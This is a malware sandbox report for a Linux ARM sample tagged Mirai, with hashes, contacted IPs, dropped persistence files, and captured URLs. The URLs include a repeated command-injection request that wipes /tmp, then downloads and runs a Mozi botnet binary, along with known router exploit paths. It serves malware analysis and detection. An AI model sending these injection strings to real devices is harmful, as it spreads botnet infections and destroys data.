bad_file

Status: finished

Submission Time: 2020-03-27 00:00:53 +01:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
218397
API (Web) ID:
333712
Analysis Started:

2020-03-27 00:00:54 +01:00
Analysis Finished:

2020-03-27 00:08:47 +01:00
MD5:
9a111588a7db15b796421bd13a949cd4
SHA1:
034c8c51a58be11ca620ce3eb0d43d5a59275d2f
SHA256:
e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 38/59

Open Full Report

malicious

Score: 17/40

malicious

IPs

IP	Country	Detection
202.32.159.161	Japan
20.58.72.148	United States
125.203.103.27	Japan
Click to see the 97 hidden entries
117.91.237.125	China
184.41.224.59	United States
59.24.146.66	Korea Republic of
148.160.88.153	Sweden
178.246.150.164	Turkey
146.216.3.16	Switzerland
137.92.166.90	Australia
36.130.17.34	China
157.122.23.74	China
77.243.24.218	Serbia
34.43.246.189	United States
124.117.118.192	China
90.93.31.32	France
98.130.55.126	United States
175.252.194.14	Korea Republic of
115.69.133.174	India
80.244.65.203	Sweden
93.129.162.40	Germany
17.118.162.234	United States
174.112.81.67	Canada
69.138.240.96	United States
201.0.17.175	Brazil
110.25.202.59	Taiwan; Republic of China (ROC)
40.55.196.197	United States
114.241.177.238	China
81.20.2.123	United Kingdom
183.155.137.94	China
176.208.119.10	Russian Federation
36.115.15.233	China
193.195.16.240	United Kingdom
12.176.45.163	United States
189.199.154.151	Mexico
6.156.246.251	United States
187.53.171.89	Brazil
37.69.223.188	France
16.53.242.88	United States
51.150.172.125	United Kingdom
126.100.201.40	Japan
140.217.189.31	United States
3.44.85.245	United States
89.204.253.144	Ireland
95.123.98.209	Spain
77.179.3.1	Germany
161.21.127.189	United States
19.49.225.155	United States
114.160.20.248	Japan
98.17.159.11	United States
12.20.239.35	United States
122.32.183.168	Korea Republic of
150.18.206.5	Japan
39.42.204.73	Pakistan
161.165.26.133	United States
135.85.115.169	United States
38.222.148.200	United States
221.140.154.116	Korea Republic of
5.240.38.180	Sweden
133.224.22.99	Japan
180.124.227.164	China
175.61.84.180	China
86.139.42.220	United Kingdom
191.159.218.255	Colombia
106.181.45.215	Japan
150.208.226.117	United States
77.88.194.62	Ukraine
41.27.174.179	South Africa
139.199.227.105	China
176.216.166.231	Turkey
47.160.207.156	United States
173.26.25.161	United States
19.251.188.20	United States
110.212.244.215	China
191.0.207.228	Brazil
94.115.215.230	Germany
115.150.164.244	China
28.242.177.230	United States
207.89.200.160	United States
185.170.103.99	United Kingdom
95.170.39.37	France
157.83.27.223	United Kingdom
194.44.151.71	Ukraine
118.250.168.199	China
66.216.37.70	United States
106.90.251.5	China
117.126.63.97	China
67.117.154.135	United States
181.192.4.243	Argentina
139.199.192.5	China
210.117.189.192	Korea Republic of
168.43.21.159	United States
146.186.130.161	United States
216.145.223.107	United States
119.92.40.84	Philippines
54.96.22.176	United States
83.33.145.175	Spain
9.125.222.67	United States
1.158.220.185	Australia
25.129.170.1	United Kingdom

URLs

Name	Detection
http://132.147.104.91:80/HNAP1/
http://23.80.108.148:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://66.244.232.101:80/HNAP1/
Click to see the 28 hidden entries
http://221.122.86.92:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://153.131.15.233:80/HNAP1/
http://155.230.143.39:80/HNAP1/
http://190.193.6.237:80/HNAP1/
http://69.194.10.142:80/HNAP1/
http://127.0.0.1:5555/UD/act?1
http://34.232.24.180:80/HNAP1/
http://202.32.159.161:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://173.44.220.74:80/HNAP1/
http://114.40.23.230:80/HNAP1/
http://132.205.94.44:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca
http://pastebin.ca)
http://www.pastebin.ca.
http://www.alsa-project.org.
http://156.250.119.72:49152/soap.cgi?service=WANIPConn1
http://123.58.44.88:37215/ctrlt/DeviceUpgrade_1
http://www.alsa-project.org/alsa-info.sh
http://103.42.38.18:37215/ctrlt/DeviceUpgrade_1
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://www.alsa-project.org/cardinfo-db/
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://upx.sf.net
http://189.203.214.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws

Dropped files

Name	File Type	Hashes
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
Click to see the 97 hidden entries
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountall.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/keyutils/request-key-debug.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/libsane/plustek/MakeModule.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/libreoffice/soffice.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#

bad_file

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

bad_file Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Search started

bad_file